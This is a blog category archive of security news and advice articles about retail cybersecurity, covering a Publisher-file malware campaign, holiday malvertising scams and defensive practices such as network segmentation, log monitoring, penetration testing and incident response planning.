Category Archives: retail

New Macro Downloaders Use PUB Files to Compromise Food and Retail Companies

New macro downloaders are using Microsoft Publisher (PUB) files and spam emails to serve up network compromise in the food and retail sectors.

According to Trend Micro, the campaign ramped up late last month with over 50 food and retail companies spammed between Nov. 20–27. Targets included food sector companies Starbucks and Taco Del Mar and retailers Harris Teeter and Save Mart Supermarkets. Trend Micro also detected attacks against the U.S. Department of Agriculture and the financial sector dating to the first week in November.

Setting this campaign apart is its use of PUB files, which are not commonly associated with macro malware. Combined with socially engineered spam emails from “operations teams,” these PUB invoices appear legitimate. Once opened, they serve up malicious Microsoft Installer (MSI) files that contact command-and-control (C&C) servers to install remote access Trojans (RATs). Given the lack of PUB files used by macro downloaders and the use of MSI files for legitimate installations, infections may go unnoticed by both users and standard antimalware tools.

Spam Is a Recipe for Disaster During the Holidays

Both retail and food companies are gearing up for their busiest quarter of the year, which could increase their likelihood of falling victim to spam attacks. Cybercriminals’ use of PUB files enhances this risk, since employees may not recognize these files as potential threats. Intalled RATs can then hide in plain sight until attackers are ready to conduct reconnaissance or download new malware tools.

The campaign also prioritizes evasion by scheduling the MSI file download rather than completing it immediately after PUB files are opened. This not only delays infection to confound security measures, but assigns “msiexec” to scheduler processes, allowing it to be automatically downloaded and installed.

Address the Threat of Macro Downloaders and PUB Attacks

Seasonal spam campaigns come with a high price: Lurking RATs could target customer data or compromise corporate networks. To avoid sneaky PUB attacks, IBM experts recommend invest in layered email security services that combine perimeter protection, external mail scanning and spam control. Security teams should also segment their networks to separate critical services, point-of-sale (POS) information and consumer financial data and limit the damage caused by successful spam deliveries.

Source: Trend Micro

The post New Macro Downloaders Use PUB Files to Compromise Food and Retail Companies appeared first on Security Intelligence.

5 More Retail Cybersecurity Practices to Keep Your Data Safe Beyond the Holidays

This is the second article in a two-part series about retail cybersecurity during the holidays. Read part one for the full list of recommendations.

The holiday shopping season offers myriad opportunities for threat actors to exploit human nature and piggyback on the rush to buy and sell products in massive quantities online. Our previous post covered some network security basics for retailers. Let’s take a closer look at how retailers can properly configure and monitor their networks to help mitigate cyberattacks and provide customers with a safe shopping experience during the holiday season.

1. Take a Baseline Measurement of Your Network Traffic

Baselining is the process of measuring normal amounts of traffic over a period of days or even weeks to discern any suspicious traffic peaks or patterns that could reveal an evolving attack.

Network traffic measurements should be taken during regular business hours as well as after hours to cover the organization’s varying activity phases. As long as the initial baseline is taken during a period when traffic is normal, the data can be considered reliable. An intrusion detection system (IDS) or intrusion prevention system (IPS) can then assist with detecting abnormal traffic volumes — for example, when an intruder is exfiltrating large amounts of data when offices are closed.

Below are some factors to consider when performing a baseline measurement that could be helpful in detecting anomalies:

  • Baseline traffic on a regular basis.
  • Look for atypical traffic during both regular and irregular times (e.g., after hours).
  • Set alarms on an IDS/IPS for high and low thresholds to automate this process. Writing signatures specific to your company’s needs is a key element to an IDS/IPS working effectively and should be carried out by trained security specialists to avoid false alarms.
  • Investigate any discrepancies upon initial discovery and adjust thresholds accordingly.
  • Consider using an endpoint detection and response (EDR) solution to help security teams better identify threats, and to allow operations teams to remediate endpoints quickly and at scale.

Listen to the podcast: Examining the State of Retail Security

2. Run a Penetration Test Before It’s Too Late

A key preventative measure for retailers with a more mature security posture is running a penetration test. Simply put, the organization’s security team can allow a white hat hacker, or penetration tester, to manually try to compromise assets using the same tactics, techniques and procedures (TTPs) as criminal attackers. This is done to ascertain whether protections applied by the organization are indeed working as planned and to find any unknown vulnerabilities that could enable a criminal to compromise a high-value asset.

Manual testing should be performed in addition to automated scanning. Whereas automated tools can find known vulnerabilities, manual testing finds the unknown vulnerabilities that tools alone cannot find. Manual testing also targets the systems, pieces of information and vulnerabilities most appealing to an attacker, and specifically focuses on attempting to exploit not just technical vulnerabilities within a system, but business logic errors and other functionality that, when used improperly, can grant unintended access and/or expose sensitive data.

The key to a penetration test is to begin by assessing vulnerabilities and addressing as many of them as possible prior to the test. Then, after controls are in place, decide on the type of test to carry out. Will it be a black box test, where the testers receive no information about the target’s code and schematics? Or will it be a white box test, where organizations fully disclose information about the target to give the tester full knowledge of how the system or application is intended to work? Will it be in a very specific scope and only include customer-facing applications?

It can be helpful to scope a penetration test by taking the following three steps prior to launching the testing period:

  1. Establish goals for the testing. Since penetration testing is intended to simulate a real-world attack, consider scenarios that are relevant to your organization. Giving thought to what type of data is at risk or what type of attacker you’re trying to simulate will allow the testers to more closely approximate threats relevant to your organization.
  2. Draft a thorough contract to state the expectations and scope of the project. For example, if there are specific areas a penetration tester should not access based on criticality or sensitivity, such as production servers or credit card data, outline these points in the contract. Also, define whether the penetration testers should attempt to compromise both physical access and remote access to compromise networks, or if just one is preferred. Consider if you wish to have social engineering included within the test as well.
  3. Have the vendor and its employees sign nondisclosure agreements (NDAs) to keep their findings confidential and ensure their exclusive use by the organization.

Penetration testers from reputable companies are thoroughly vetted before being allowed to conduct these tests. The retail industry can benefit from this type of testing because it mimics the actions of a threat actor and can reveal specific weaknesses about an organization. It can even uncover deficiencies in staff training and operational procedures if social engineering is included within the scope of the testing.

3. Check Your Log Files for Anomalies

Log data collected by different systems throughout an organization is critical in investigating and responding to attacks. Bad actors know this and, if they manage to breach an organization and gain elevated privileges, will work to cover up their tracks by tampering with logs.

According to IBM X-Force Incident Response and Intelligence Services (IRIS) research, one of the most common tactics malicious actors employ is post-intrusion log manipulation. In looking to keep their actions concealed, attackers will attempt to manipulate or delete entries, or inject fake entries, from log files. Compromising the integrity of security logs can delay defenders’ efforts to find out about malicious activity. Additional controls and log monitoring can help security teams avoid this situation.

Below are some helpful tips and examples of security logs that must be checked to determine whether anything is out of the ordinary.

  • Are your logs being tampered with? Look for altered timestamps, missing entries, additional or duplicate entries, and anomalous login attempts.
  • Transfer old log files to a restricted zone on your network. This can help preserve the data and create space for logs being generated overnight.
  • Use a security information and event management (SIEM) tool to assist with analyzing logs and identifying anomalies reported by your organization’s security controls.
  • To include as many sources of information as possible, plug in endpoint, server, network, transaction and security logs for analysis by a SIEM system. Look for red flags such as multiple failed logins, denied access to sensitive areas, ping sweeps, etc.

Knowing which logs to investigate is also critical to successful log analysis. For example, point-of-sale (POS) systems are often installed on Microsoft Windows or Linux systems. It is therefore critical to review operating system logs for these particular endpoints. When it comes to POS networks, where many of the devices are decentralized, daily usage, security and application logs are good places to look for anomalies.

For network security, use logs from network appliances to determine failed or excessive login attempts, increases or decreases in traffic flow, and unauthorized access by users with inadequate privilege levels.

4. Balance Your Network and Website Traffic

According to the National Retail Federation, online sales from November and December 2017 generated more than $138.4 billion, topping 2016 sales by 11.5 percent. This year is likely going to set its own record. With internet traffic volumes expected to be at their highest, online retailers that are unprepared could see the loss of sales and damaged reputation in the aftermath of the holiday season.

But preparing for extra shoppers is the least of retailers’ worries; attackers may take advantage of the festive time of year to extort money by launching distributed denial-of-service (DDoS) attacks against retail websites. These attacks work by flooding a website or network with more traffic than it can handle, causing it to cease accepting requests and stop responding.

To stay ahead of such attacks, online retailers can opt to use designated controls such as load balancers. Load balancers are an integral part of preventing DDoS attacks, which can affect POS systems storewide. With a well-coordinated DDoS attack, a malicious actor could shut down large parts of their target’s networks.

One best practice is to prepare before traffic peaks. Below are some additional tips for a more balanced holiday season.

  • Preventing a DDoS attack can be an imposing undertaking, but with a load balancing device, most of this work can be automated.
  • Load balancers can be either hardware devices or virtual balancers that work to distribute traffic as efficiently as possible and route it to the server or node that can best serve the customer at that given moment. In cases of high traffic, it may take several load balancers to do the work, so evaluate and balance accordingly.
  • Load balancers can be programmed to direct traffic to servers dedicated to customer-facing traffic. Using them can also enable you to move traffic to the proper location instead of inadvertently allowing access to forbidden areas.

Load balancers are typically employed by larger companies with a prominent web footprint. However, smaller companies should still consider employing them because they serve a multitude of purposes. Keeping the load on your servers balanced can help network and website activity run smoothly year-round and prevent DDoS attacks from doing serious damage to your organization’s operations or web presence.

5. Plan and Practice Your Incident Response Strategy

An incident response (IR) plan is essential to identifying and recovering from a security incident. Security incidents should be investigated until they have been classified as true or false positives. The more timely and coordinated an organization’s response is to an incident, the faster it can limit and manage the impact. A solid IR plan can help contain an incident rapidly and result in better protection of customer data, reduction of breach costs and preservation of the organization’s reputation.

If your enterprise does not have an IR plan, now is the time to create one. In the event that your enterprise already has a plan, take the time to get key stakeholders together to review it and ensure it is up-to-date. Most importantly, test and drill the plan and document its effectiveness so you’re prepared for the attack scenarios most relevant to your organization.

When evaluating an IR plan, consider the following tips to help accelerate your organization’s response time:

  • Threat actors who compromise retail cybersecurity will typically turn stolen data around quickly for a profit on the dark web. Use dark web search tools to look for customer data that may have been compromised. Sometimes, data can be identified by the vendor that lost it, leading to the detection of an ongoing attack.
  • Before an attack occurs, establish a dedicated IR team with members from different departments in the organization.
  • Make sure each team member knows his or her precise role in the case of an incident.
  • Keep escalation charts and runbooks readily available to responders, and make sure copies are available offline and duplicated in different physical locations.
  • Test your IR strategy under pressure in an immersive cyberattack simulation to find out where the team is strong and what may still need some fine-tuning.

Make Retail Cybersecurity a Year-Round Priority

Increased vigilance is important for retailers during the holiday season, but these network security basics and practices can, and should, be maintained throughout the year. Remember, attackers don’t just wait until the holiday season to strike. With year-round preparation, security teams can mitigate the majority of threats that come their way.

Read the latest IBM X-Force Research

The post 5 More Retail Cybersecurity Practices to Keep Your Data Safe Beyond the Holidays appeared first on Security Intelligence.

Security Affairs: 4 Industries That Have to Fight the Hardest Against Cyberattacks

Society’s dependence on internet-based technologies means security professionals must defend against cyberattacks as well as more traditional threats, such as robbers or disgruntled employees.

However, cybercriminals target some industries at disproportionally high rates. Here are four of them:

1. Health Care

Since health care professionals deal with life-or-death situations, cyberattacks could hinder both productivity and patient care to a tremendous degree. Some attacks shut down entire health systems comprising multiple facilities or forcing affected individuals to switch from computerized processes to using pens and paper.

The medical industry faces an exceptional risk for cyberattacks because there are so many players involved in the sector. More than 83 percent of organizations responding to a recent survey reported making new or improved organizational security enhancements.

That’s notable progress, but analysts also worry about the potential for attacks that don’t directly target hospitals or similar organizations. Recent demonstrations from cybersecurity researchers have shown how it’s possible to hack into medical devices like pacemakers or insulin pumps.

There are also instances of hospitals being unable to perform fundamental services. In November 2018, a ransomware attack forced two hospitals to send ambulances elsewhere and only accept walk-up patients to the emergency rooms.

Hackers know they can wreak substantial havoc by attacking hospitals, thereby increasing the potential for notoriety. It doesn’t hurt that those organizations keep medical records containing valuable information hackers could sell on the black market. One instance with North Carolina-based company Atrium Heath potentially breached the data of 2.65 million people.

2. Nonprofit

Nonprofits typically focus their efforts on causes that improve society at large, at-risk groups and others in need. However, cyberattacks could thwart all those intentions to put energy toward the greater good. Research indicates cyberattacks threaten nonprofit organizations for various reasons.

Data from 2017 found only 27 percent of nonprofits broke even that year. So, if nonprofit leaders want to devote more money to cybersecurity, they may feel too financially strapped to make meaningful progress. Plus, many nonprofits have small teams of hired employees and rely heavily on volunteers otherwise. That bare-bones staffing structure could make it harder than average for nonprofits to recover after issues happen.

Also, nonprofits may feel overwhelmed about where to start as they learn about cybersecurity. Fortunately, some products geared toward nonprofits have robust integrated security. Volgistics is a company associated with volunteer management that serves 5,121 organizations. A section on its website details the online and offline measures taken to keep customer data safe.

3. Retail

The retail industry is cyclical, so certain times of the year — including the holiday season or when kids go back to school — are particularly busy. Plus, cybercrime problems could take websites offline or cause reputational damage. Despite those risks, retailers make blunders when budgeting for cybersecurity. A recent report found 50 percent of all data breaches in the U.S. happened at retail establishments.

The study also determined that entities spend the most money on cybersecurity measures considered among the least effective. No matter what, it’s crucial for the retail sector to take cybersecurity seriously. Research from Gemalto found 70 percent of people would stop doing business with companies that suffer data breaches. So, failing to conquer the problem could lead to profit losses in unexpected ways.

4. Financial Services

People rely on banks to do daily transactions for business or personal reasons. And, since financial institutions have extraordinary amounts of money on hand, it’s not surprising they’re prime targets for cybercriminals. Even financial industry businesses that don’t store so many financial resources on site — such as wealth management companies — keep documents filled with clients’ personal details.

The financial sector is also so potentially lucrative for hackers that they may set their sights on carrying out attacks on ATMs in multiple countries. Sources report a North Korean hacking group known as Lazarus is believed to be behind attacks in 23 countries totaling tens of millions of dollars.

There’s an emerging trend of banks hiring ethical hackers to find vulnerabilities and test existing safeguards. That’s a practical way to address cybercrime risks, but it’s an approach that’ll likely become increasingly harder to choose. That’s because there’s already a gigantic cybersecurity skills gap consisting of hundreds of thousands of open cybersecurity positions, and forecasts say the shortage will get worse.

cyberattacks

No Industry Is Immune

Any sector that uses the internet to conduct business could become a cybercriminal’s target.

Although the industries mentioned here need to take particular care to prevent issues, proactive steps taken to fix problems and monitor for suspicious issues could keep all companies safer from cybercrime.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, cyberattacks)

The post 4 Industries That Have to Fight the Hardest Against Cyberattacks appeared first on Security Affairs.



Security Affairs

4 Industries That Have to Fight the Hardest Against Cyberattacks

Society’s dependence on internet-based technologies means security professionals must defend against cyberattacks as well as more traditional threats, such as robbers or disgruntled employees.

However, cybercriminals target some industries at disproportionally high rates. Here are four of them:

1. Health Care

Since health care professionals deal with life-or-death situations, cyberattacks could hinder both productivity and patient care to a tremendous degree. Some attacks shut down entire health systems comprising multiple facilities or forcing affected individuals to switch from computerized processes to using pens and paper.

The medical industry faces an exceptional risk for cyberattacks because there are so many players involved in the sector. More than 83 percent of organizations responding to a recent survey reported making new or improved organizational security enhancements.

That’s notable progress, but analysts also worry about the potential for attacks that don’t directly target hospitals or similar organizations. Recent demonstrations from cybersecurity researchers have shown how it’s possible to hack into medical devices like pacemakers or insulin pumps.

There are also instances of hospitals being unable to perform fundamental services. In November 2018, a ransomware attack forced two hospitals to send ambulances elsewhere and only accept walk-up patients to the emergency rooms.

Hackers know they can wreak substantial havoc by attacking hospitals, thereby increasing the potential for notoriety. It doesn’t hurt that those organizations keep medical records containing valuable information hackers could sell on the black market. One instance with North Carolina-based company Atrium Heath potentially breached the data of 2.65 million people.

2. Nonprofit

Nonprofits typically focus their efforts on causes that improve society at large, at-risk groups and others in need. However, cyberattacks could thwart all those intentions to put energy toward the greater good. Research indicates cyberattacks threaten nonprofit organizations for various reasons.

Data from 2017 found only 27 percent of nonprofits broke even that year. So, if nonprofit leaders want to devote more money to cybersecurity, they may feel too financially strapped to make meaningful progress. Plus, many nonprofits have small teams of hired employees and rely heavily on volunteers otherwise. That bare-bones staffing structure could make it harder than average for nonprofits to recover after issues happen.

Also, nonprofits may feel overwhelmed about where to start as they learn about cybersecurity. Fortunately, some products geared toward nonprofits have robust integrated security. Volgistics is a company associated with volunteer management that serves 5,121 organizations. A section on its website details the online and offline measures taken to keep customer data safe.

3. Retail

The retail industry is cyclical, so certain times of the year — including the holiday season or when kids go back to school — are particularly busy. Plus, cybercrime problems could take websites offline or cause reputational damage. Despite those risks, retailers make blunders when budgeting for cybersecurity. A recent report found 50 percent of all data breaches in the U.S. happened at retail establishments.

The study also determined that entities spend the most money on cybersecurity measures considered among the least effective. No matter what, it’s crucial for the retail sector to take cybersecurity seriously. Research from Gemalto found 70 percent of people would stop doing business with companies that suffer data breaches. So, failing to conquer the problem could lead to profit losses in unexpected ways.

4. Financial Services

People rely on banks to do daily transactions for business or personal reasons. And, since financial institutions have extraordinary amounts of money on hand, it’s not surprising they’re prime targets for cybercriminals. Even financial industry businesses that don’t store so many financial resources on site — such as wealth management companies — keep documents filled with clients’ personal details.

The financial sector is also so potentially lucrative for hackers that they may set their sights on carrying out attacks on ATMs in multiple countries. Sources report a North Korean hacking group known as Lazarus is believed to be behind attacks in 23 countries totaling tens of millions of dollars.

There’s an emerging trend of banks hiring ethical hackers to find vulnerabilities and test existing safeguards. That’s a practical way to address cybercrime risks, but it’s an approach that’ll likely become increasingly harder to choose. That’s because there’s already a gigantic cybersecurity skills gap consisting of hundreds of thousands of open cybersecurity positions, and forecasts say the shortage will get worse.

cyberattacks

No Industry Is Immune

Any sector that uses the internet to conduct business could become a cybercriminal’s target.

Although the industries mentioned here need to take particular care to prevent issues, proactive steps taken to fix problems and monitor for suspicious issues could keep all companies safer from cybercrime.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, cyberattacks)

The post 4 Industries That Have to Fight the Hardest Against Cyberattacks appeared first on Security Affairs.

‘Tis the Season for Spreading Ad Malware

Although Black Friday and Cyber Monday are behind us, consumer scams are likely to continue surging through the coming month. Malicious actors know that online retail spikes during the holiday season, so they increase their efforts to spread ad malware rather than good cheer.

Cautious consumers might be on the lookout for malicious apps and websites, but another tactic that cybercriminals will likely leverage extensively is malvertising — ads embedded with malware. Retailers also tend to prioritize customer experience over data security, so it’s important to understand how to avoid malvertising scams and prevent opportunistic threat actors from affecting your network during the holiday season.

Recognize the Risk

According to a Black Friday digital fraud report from RiskIQ, “Some fake apps contain adware and ad clicks or malware that can steal personal information or lock the device until the user pays a ransom. Others encourage users to log in using their Facebook or Gmail credentials, potentially exposing sensitive personal information.” In fact, the researchers from RiskIQ found that the brand names of the five leading retailers were frequently used in malicious and fraudulent mobile apps.

With virtually every retailer promoting online shopping deals, the internet is a hotbed of opportunity for scams. Jerome Dangu and Jack Cohen Martin, co-founder and chief technology officer (CTO), respectively, of antimalvertising firm Confiant, said they uncovered what appeared to be the initial attack in an ongoing malvertising campaign on Nov. 12. During the course of discovery, Confiant blocked over 5 million malvertising impressions on the Google Play store meant to impersonate legitimate app downloads.

Because the ads were served in a top-tier exchange, more than 300 million bad impressions were served to publishers in just over a 48-hour period, Dangu and Cohen Martin explained. By comparison, the Zirconium group, named by Confiant as 2017’s largest malvertising operation, created and operated 28 fake ad agencies to distribute malvertising campaigns and was responsible for 1 billion impressions over the course of a full year.

Malvertising can target specific companies, but this particular campaign went after iOS users and used two domains and two types of payloads.

“One family of landing pages was more focused on fake offers from Amazon gift cards and Walmart, in differing denominations and variations,” Dangu explained.

How to Spot an Ad Malware Scam

The scam is essentially a way for an attacker to retrieve user data and resell it. Users are often delivered to fraudulent landing pages where they are asked different types of marketing questions about things like their insurance or interest in electronics.

“The attacker is getting an affiliation share on these forms that get submitted, but you can never get out of this loop of forms,” Dangu explained. “Users could enter their data forever until they finally realize it’s a waste of time and they aren’t getting an iPhone for a dollar.”

Because malicious actors have become increasingly sophisticated, the fraudulent landing pages they use appear legitimate.

“They are exploiting the user’s trust by creating malicious landing pages that adopt the same color scheme as Facebook or Google, for example. It’s important for users to make sure they are where they think they are and check the full URL address,” Cohen Martin said.

All Eyes on Mobile

In monitoring malicious traffic over the last year, Confiant saw one major change from the previous years that saw surges in malware and malvertising campaigns on browsers.

“Mobile is used more and more,” Dangu said. “Attackers are targeting more mobile through scam approaches, which is disturbing for publishers.”

In one case, ads were redirecting users to get them to subscribe to adult dating sites, and the cybercriminals were getting a cut on those subscriptions. Mobile sites tend to have more ads, and because of that density, it is more difficult to identify a scam.

“Because of the nature of business, the ads are being digitally placed there, and it is hard to get 100 percent visibility into what is going on,” said Dangu. “Service providers and exchanges need to do their part to prevent these types of risks from being available.”

How to Avoid Malvertising Scams

Given the evolution of scammer’s methods, it’s important to remember that if a deal seems too good to be true, it probably is.

“Consumers should be wary of deals and go directly to sites they trust,” said Mike Bittner, digital security and operations manager of The Media Trust.

Bittner also emphasized the responsibility of brands to identify all the code executing on their websites and mobile apps.

“Chances are high that online companies only know a small fraction of the 50–95 percent of code in their digital assets provided by third parties,” he said.

Security leaders can help protect their employees by integrating a holiday retail scam identification practice into their regular security awareness training program. They can also defend networks by deploying artificial intelligence-enabled software to flag anomalous behaviors that could potentially represent a breach.

Consumers have a choice when visiting e-commerce sites. Although it’s advisable to rely on trusted, reputable brands with strong ratings, cybercriminals are eager to exploit that trust by visually replicating those very brands. Staying cautious and fully aware of your online navigations will help you to remain safe during the holiday season and all year long.

The post ‘Tis the Season for Spreading Ad Malware appeared first on Security Intelligence.

5 Recommendations to Improve Retail Cybersecurity This Holiday Season

This is the first installment in a two-part series about how retailers can help protect their enterprises this holiday season.

With the holiday season upon us, retailers have an opportunity to boost revenues before the end of the year. Any increase in profit at the expense of retail cybersecurity, however, can cost a company more in the long run, given the rising size and costs of data breaches and associated revenue and reputational loss. With extra web traffic and high order volumes coming in, the holiday shopping season can be a particularly perilous time for businesses seeking to safeguard customer information.

A Timely Cause for Retail Cybersecurity Concerns

Tis the season for retailers to buckle down on security, since data breaches typically peak just prior to and during the holiday shopping season. IBM X-Force Incident Response and Intelligence Services (IRIS)’s assessment of X-Force Interactive Security Incident data recorded between 2012 and 2017 revealed that 41 percent of all retail and consumer product breaches occurred between September and December, elevating the risk for enterprise network breaches during that time of year. More than two-thirds of all records in the consumer products sector were leaked, lost or stolen during these last four months of the year — that’s nearly 180 million records each year.

Don’t Reward the Naughty

A growing number of retailers now offer rewards programs to retain and nurture their customer bases. For shoppers to join these programs, most retailers ask for personally identifiable information (PII) such as name, address, phone number and email address. If ever compromised, an attacker can correlate this customer PII to payment data and use it to aggregate information to compromise the user’s identity.

In line with recent regulatory laws such as the General Data Protection Regulation (GDPR), retailers should collect the least possible amount of PII on customers, have a clear purpose for each data element, and make sure to always keep data encrypted and safeguarded, both in transit and at rest.

Phishing Is in Season

Attackers don’t wait for the holiday season to begin launching spam campaigns, which are often employed as the first stage of their overall fraud and attack campaigns. Analysis of X-Force spam honeypot data collected between 2015 and 2018 revealed a notable rise in the average volume of spam emails beginning in August, with September slightly lower and October ranking third.

Average Spam per Month

Figure 1: Total volume of spam emails recorded, 2015–2018 (Source: IBM X-Force)

Preventing and responding to data breaches leading up to and during the holiday shopping season has become imperative. It is incumbent on retail security professionals to perform due diligence during this time, and there are several ways to accomplish this goal.

Below are five holiday season tips for retailers to help make your enterprise a safer shopping environment. These techniques can help retailers identify impending data breaches and sidestep the costs associated with a major data breach.

While I’ve listed these tips in the order of what I generally consider to be top-of-mind for retailers, this list can be customized to serve your organization’s specific needs.

1. Mitigate the POS Malware Threat

After a popular big box retailer suffered a breach in 2013, public awareness around the vulnerability of point-of-sale (POS) systems grew exponentially. That breach was facilitated by malware that infected POS machines and helped threat actors access a large volume of credit card information to sell to other criminals on the dark web. This intrusion resulted in the theft of more than 110 million records.

Five years later, POS malware continues to plague retailers. According to IBM X-Force, 74 percent of publicly reported POS malware breaches in 2017 impacted the retail sector. X-Force IRIS has observed malicious actors using POS malware, such as FrameworkPOS and PoSeidon, to siphon credit card data from POS terminals. Web-based malware, which steals credit card data on the fly as online transactions are processed, is also gaining steam.

To help mitigate these risks, both in physical and virtual realms, retailers should take the following steps:

  • Use some form of malware detection on your entire network to include the network of POS systems.
  • Test the devices’ hardware and software (more to come on penetration testing in the second installment of this series) and keep devices up-to-date through regular patching.
  • Work with a supplier that will contractually adhere to both your regulatory standards and security requirements.
  • When using mobile POS, have controls in place to ensure the integrity of the hand-held device and the encryption of its communication channels with the server that processes and stores card data.
  • Ensure any mobile payment system is from a trusted provider that supplies regular updates, patches, and equipment upgrades to comply with advances in encryption requirements and evolving threats.

Cybercriminals also commonly steal credit card data through payment card skimmers. These physical devices are fitted into the mouth of card readers and work by copying track data from the credit card and storing it on a memory chip inside the skimming device. In addition to retail establishments, skimmers are often found in ATMs, restaurants and gas stations.

As a precaution, retailers should frequently search for devices on their POS terminals and swiping equipment. Attackers typically attach skimmers to the device by sliding them onto the scanners and collecting them later. To check for a skimmer, examine devices daily and pull on the scanner if anything appears different. If part of the device comes off, it may be a skimming device. Call your service provider and IT security team to report it before resuming activity with that terminal or device.

With security controls and practices becoming more efficient, threat actors have resorted to gluing card skimmers to machines. This makes it difficult to detach by simply pulling it off the affected device. Retailers should train employees in all locations to recognize the proper look and components of their POS terminals and swiping devices. Employees should also know how to report suspicious devices.

2. A Clean Network Is a Safe Network

Payment card data carries immediate monetary value to criminals, and there are many methods by which they aim to steal it.

One tactic IBM X-Force researchers have seen increasingly often is the injection of malicious code into legitimate e-commerce websites. By compromising websites where people shop online, attackers can send payment data submitted during customer checkout to their own infrastructure.

To help reduce the likelihood of becoming a feeding ground for criminals, online retailers should take the following steps:

  • Harden the security of underlying web servers.
  • Limit access to critical assets and properly manage the privileges of those that maintain them.
  • Ensure that web applications are secure, harden them against threats like SQL injections and other common attacks, and have them tested regularly.
  • Deploy a change monitoring and detection solution to spot unauthorized modifications to your e-commerce platform’s web hosting directories. If this is not feasible, schedule periodic, manual reviews of these assets.

Account takeover (ATO), which occurs when a threat actor gains unauthorized access to an online account that belongs to someone else, can also affect e-commerce customers. With access to shoppers’ accounts, fraudsters can wreak havoc by stealing stored payment data, making fraudulent purchases and rerouting existing orders to a different address, for example.

Unauthorized access requires the use of legitimate credentials, which criminals can attain through a variety of tactics. The most common methods include phishing, brute-forcing weak passwords and launching SQL injection attacks on the web application itself.

You can help mitigate these threats by practicing good network hygiene. Here are some useful tips retailers can apply today to lower the risk of user account compromises:

  • Employ the most recent patches for all hardware, internal and external software, network communication protocols, and database security protocols.
  • Sanitize user input to prevent injection attacks.
  • Prioritize patching for the threats most relevant to your organization. Look out for the most-exploited vulnerabilities and ensure that internet-facing servers and systems are up to date.
  • Always consult your local computer emergency response team (CERT), IBM X-Force Exchange and other threat intelligence sources to gather the latest news on vulnerabilities and mitigation techniques.
  • Enforce multifactor authentication (MFA) for employees.

3. Go to Your Separate Corners

Cybercriminals are always leveraging new ways to steal payment card data and correlate it with PII. Elevated volumes of web traffic during the holiday season provide attackers with even more targets and opportunities.

To help keep customer data safe, even in cases where criminals manage to infiltrate assets, security teams should keep PII, financial data and POS information separate by segmenting enterprise networks. By keeping this information separated and encrypted, attackers will find it much harder to correlate data on customers. While segmenting a network can be an intensive process, it’s a small price to pay to keep customer data safe.

In network segmentation, allow only one IP address per segment to communicate at a time to detect suspicious traffic. While an attacker may spoof his or her IP address, this control can allow defenders to find out about most intruders rather easily. Here are some other best practices to consider:

  • Conduct internal audits for segment crossover to ensure that segregated data sets do not get mixed over time and appear in other places on the network, which can help attackers with identity theft.
  • Deploy web application firewalls (WAFs) to help ensure that incoming traffic is filtered, monitored and blocked to and from web applications to mitigate threats such as cross-site scripting (XSS) and SQL injection.
  • As a secondary measure, a firewall should be implemented to effectively govern all traffic coming in and out of the network. Firewall configuration is a key element in its effectiveness and should be performed by a certified network technician.
  • Have administrative users log in with a lower privilege level before escalating their privileges to perform updates and maintenance.
  • Prevent sensitive users and systems from communicating with the internet.

4. Learn From History and Educate Users

Nearly every company has some kind of data protection training in place. To make employee training programs more effective, organizations must understand that training materials are sometimes clicked through at a rapid pace to complete them as quickly as possible in favor of getting back to work. So how can an organization effectively educate their users?

  • Plan for role-based training of all employees in the organization.
  • Train employees on both physical and digital security.
  • Conduct short training sessions and field-test them by asking for employee feedback.
  • Launch an internal phishing campaign: Send a spoofed email from a dummy account with official-sounding names, titles and subjects, and track the number of users who click on the links or attachments. Offer additional training according to the conclusions from the campaign.
  • Identify users who need remedial training and retest as needed.
  • Most importantly, provide all users with an easily accessible resource to report issues. Users should be able to contact IT security with any question or suspicion.

For education to be effective, it has to be repetitive and stay top-of-mind for users across the entire organization. Get management to support awareness campaigns and find opportunities to educate users. Having vigilant employees makes mitigating attacks during the holiday season that much more effective. Frequent email reminders, illustrative posters and communicating best practices during team meetings can demonstrate your organization’s commitment to secure day-to-day conduct. Giving users personalized attention can go a long way toward making the message resonate with them — for example, you might consider gifting a security-themed mug for the holiday season.

5. Use Network IP Whitelists and Blacklists

Whitelists are IP addresses or domains used specifically for allowing access, whereas blacklists are used to help prevent IP addresses or domains from entering a network. Whitelists and blacklists are useful for keeping unauthorized and authorized connections within or outside the network. Keeping these lists up-to-date demands some diligence, but they can be crucial to boosting network security.

Filtering IPs according to these lists is more suitable for enterprises that do not manage e-commerce activity, since e-commerce companies have to accept inbound requests from all over the world, especially during the holiday shopping season.

These lists are much easier to maintain for networks that do not face external customers because blacklists can be used on both inbound and outbound access to help block known malicious hosts from communicating or accessing the organization’s data and assets. Below are some basic tips for filtering hosts:

  • Blacklist any IP addresses known to be malicious. Constantly updated lists can be fed into security solutions directly from threat intelligence platforms.
  • Should a blacklisted IP address have legitimate reasons for communicating with the network, investigate, confirm and allow access via the whitelist.
  • Whitelists should include any internal company addresses.
  • Whitelists should exclude any websites that are not relevant for employees carrying out their daily tasks (e.g., social media, webmail, etc.).
  • It is imperative to verify these lists periodically to help ensure that all information is accurate.
  • Should any IP addresses on the whitelist become outdated, it should be promptly removed or moved to the blacklist.
  • Keeping allowed and banned IP addresses from becoming intermingled is a basic premise of effective whitelist/blacklist practices.

Stay Tuned for More Holiday Season Tips for Retailers

There is no such thing as unimportant data. Take every necessary precaution to help protect enterprise and customer data by implementing strong retail cybersecurity controls, educating users and following current best practices. Maintaining customer confidence in your ability to protect their PII can result in more business, increased customer loyalty and stronger organizational reputation.

Stay tuned for five more tips to help retailers stay secure this holiday season.

Read the latest IBM X-Force Research

The post 5 Recommendations to Improve Retail Cybersecurity This Holiday Season appeared first on Security Intelligence.

Why Is the Retail Industry Still Lacking Security?

As another busy shopping season kicks into high gear, many of us will head to online retail sites and apps to check items off their holiday gift list. Security leaders should be mindful that if users do their shopping while at work, they are putting sensitive data — and possibly even the corporate network — at risk. That’s because retail industry sites and systems are too often poorly secured.

A recent survey from third-party risk management firm SecurityScorecard found that retail is among the lowest-ranked industries in terms of its security stance. The report looked at 1,444 domains in the industry with an IP footprint of at least 100 and found that retail had the second-lowest app security performance among major sectors, outperforming only the entertainment industry. What are retailers doing wrong?

Why Can’t Retailers Make the Grade?

“This year the retail industry’s security posture fell lower than in years past, both in application security and social engineering,” Fouad Khalil, head of compliance at SecurityScorecard, said in a press release. “To remain competitive, retailers are adopting new payment and digital technologies, exposing them as prime targets for cybercriminals.”

